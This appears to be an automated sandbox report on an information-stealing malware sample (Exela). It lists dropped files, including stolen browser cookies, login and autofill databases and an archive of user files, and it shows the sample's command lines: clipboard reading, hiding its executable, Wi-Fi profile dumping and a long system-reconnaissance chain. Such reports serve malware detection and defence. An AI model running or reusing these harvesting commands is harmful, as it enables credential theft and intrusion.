Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SecuriteInfo.com.FileRepMalware.22561.28030.exe
|
initial sample
|
|||
C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\Browsers\Cookies.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\Browsers\Firefox\History.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\network_info.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\process_info.txt
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\system_info.txt
|
Algol 68 source, ASCII text, with CRLF, CR line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\EFOYFBOLXA.png
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\NEBFQQYWPS.xlsx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\PIVFAGEAAV.png
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\PWCCAWLGRE.jpg
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\ZQIXMVQGAH.xlsx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_asyncio.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_bz2.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_cffi_backend.cp310-win_amd64.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_ctypes.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_decimal.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_hashlib.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_lzma.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_multiprocessing.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_overlapped.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_queue.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_socket.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_sqlite3.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_ssl.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\_uuid.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_helpers.cp310-win_amd64.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_parser.cp310-win_amd64.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_writer.cp310-win_amd64.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_websocket.cp310-win_amd64.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist\_frozenlist.cp310-win_amd64.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\libcrypto-1_1.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\libffi-7.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\libssl-1_1.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\multidict\_multidict.cp310-win_amd64.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\propcache\_helpers_c.cp310-win_amd64.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\pyexpat.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\python3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\python310.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\select.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\sqlite3.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\unicodedata.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\yarl\_quoting_c.cp310-win_amd64.pyd
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\49flztqg
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\Display (1).png
|
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\AutofillData.db
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie
0x37, schema 4, UTF-8, version-valid-for 8
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Cookies.db
|
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8,
version-valid-for 7
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\DownloadData.db
|
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4,
UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\HistoryData.db
|
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4,
UTF-8, version-valid-for 1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Logins.db
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie
0xe, schema 4, UTF-8, version-valid-for 2
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\GAOBCVIQIJ.png
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\IPKGELNTQY.docx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\LSBIHQFDVT.docx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\LSBIHQFDVT.pdf
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\NEBFQQYWPS.docx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\PALRGUCVEH.mp3
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\QNCYCDFIJJ.mp3
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\QNCYCDFIJJ.pdf
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\QNCYCDFIJJ.xlsx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\SQSJKEBWDT.jpg
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\SQSJKEBWDT.mp3
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\SUAVTZKNFL.pdf
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\ZQIXMVQGAH.jpg
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\EFOYFBOLXA.png
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\GAOBCVIQIJ.png
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\IPKGELNTQY.docx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\LSBIHQFDVT.docx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\LSBIHQFDVT.pdf
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\NEBFQQYWPS.docx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\NEBFQQYWPS.xlsx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\PALRGUCVEH.mp3
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\PIVFAGEAAV.png
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\PWCCAWLGRE.jpg
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\QNCYCDFIJJ.mp3
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\QNCYCDFIJJ.pdf
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\QNCYCDFIJJ.xlsx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\SQSJKEBWDT.jpg
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\SQSJKEBWDT.mp3
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\SUAVTZKNFL.pdf
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\ZQIXMVQGAH.jpg
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Documents\ZQIXMVQGAH.xlsx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\EFOYFBOLXA.png
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\GAOBCVIQIJ.png
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\IPKGELNTQY.docx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\LSBIHQFDVT.docx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\LSBIHQFDVT.pdf
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\NEBFQQYWPS.docx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\NEBFQQYWPS.xlsx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\PALRGUCVEH.mp3
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\PIVFAGEAAV.png
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\PWCCAWLGRE.jpg
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\QNCYCDFIJJ.mp3
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\QNCYCDFIJJ.pdf
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\QNCYCDFIJJ.xlsx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\SQSJKEBWDT.jpg
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\SQSJKEBWDT.mp3
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\SUAVTZKNFL.pdf
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\ZQIXMVQGAH.jpg
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\ZQIXMVQGAH.xlsx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\IPKGELNTQY\GAOBCVIQIJ.png
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\IPKGELNTQY\IPKGELNTQY.docx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\IPKGELNTQY\LSBIHQFDVT.pdf
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\IPKGELNTQY\NEBFQQYWPS.xlsx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\IPKGELNTQY\QNCYCDFIJJ.mp3
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\IPKGELNTQY\ZQIXMVQGAH.jpg
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LSBIHQFDVT\EFOYFBOLXA.png
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LSBIHQFDVT\LSBIHQFDVT.docx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LSBIHQFDVT\PALRGUCVEH.mp3
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LSBIHQFDVT\QNCYCDFIJJ.xlsx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LSBIHQFDVT\SQSJKEBWDT.jpg
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LSBIHQFDVT\SUAVTZKNFL.pdf
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NEBFQQYWPS\NEBFQQYWPS.docx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NEBFQQYWPS\PIVFAGEAAV.png
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NEBFQQYWPS\PWCCAWLGRE.jpg
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NEBFQQYWPS\QNCYCDFIJJ.pdf
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NEBFQQYWPS\SQSJKEBWDT.mp3
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\StealedFilesByExela\NEBFQQYWPS\ZQIXMVQGAH.xlsx
|
ASCII text, with very long lines (1024), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Web.db
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie
0x37, schema 4, UTF-8, version-valid-for 8
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\VCRUNTIME140.dll
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\attrs-24.2.0.dist-info\INSTALLER
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\attrs-24.2.0.dist-info\METADATA
|
Unicode text, UTF-8 text, with very long lines (411)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\attrs-24.2.0.dist-info\RECORD
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\attrs-24.2.0.dist-info\WHEEL
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\attrs-24.2.0.dist-info\licenses\LICENSE
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\base_library.zip
|
Zip archive data, at least v2.0 to extract, compression method=store
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info\INSTALLER
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info\METADATA
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info\RECORD
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info\WHEEL
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info\license_files\LICENSE
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info\license_files\LICENSE.APACHE
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography-43.0.3.dist-info\license_files\LICENSE.BSD
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0t1faps.il3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkesy0nl.lqb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tg1dm3o1.nds.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrc3jcte.obs.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.0.cs
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (610), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (743), with CRLF, CR line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
|
data
|
dropped
|
There are 135 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
|
"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
|
||
C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
|
"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "ver"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "gdb --version"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic path win32_VideoController get name
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic computersystem get Manufacturer
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic path Win32_ComputerSystem get Manufacturer
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic csproduct get uuid
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
|
||
C:\Windows\System32\attrib.exe
|
attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
|
||
C:\Windows\System32\cmd.exe
|
cmd.exe /c chcp
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Get-Clipboard
|
||
C:\Windows\System32\cmd.exe
|
cmd.exe /c chcp
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host
Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername
& echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup &
echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator
User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist####
& tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts &
echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service
Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show
config"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
|
||
C:\Windows\System32\systeminfo.exe
|
systeminfo
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show profiles
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic logicaldisk get caption,description,providername
|
||
C:\Windows\System32\net.exe
|
net user
|
||
C:\Windows\System32\net1.exe
|
C:\Windows\system32\net1 user
|
||
C:\Windows\System32\net.exe
|
net localgroup
|
||
C:\Windows\System32\net1.exe
|
C:\Windows\system32\net1 localgroup
|
||
C:\Windows\System32\net.exe
|
net localgroup administrators
|
||
C:\Windows\System32\net1.exe
|
C:\Windows\system32\net1 localgroup administrators
|
||
C:\Windows\System32\net.exe
|
net user guest
|
||
C:\Windows\System32\net1.exe
|
C:\Windows\system32\net1 user guest
|
||
C:\Windows\System32\net.exe
|
net user administrator
|
||
C:\Windows\System32\net1.exe
|
C:\Windows\system32\net1 user administrator
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic startup get caption,command
|
||
C:\Windows\System32\ipconfig.exe
|
ipconfig /all
|
||
C:\Windows\System32\ARP.EXE
|
arp -a
|
||
C:\Windows\System32\NETSTAT.EXE
|
netstat -ano
|
||
C:\Windows\System32\netsh.exe
|
netsh firewall show state
|
||
C:\Windows\System32\netsh.exe
|
netsh firewall show config
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic csproduct get uuid
|
||
C:\Windows\System32\cmd.exe
|
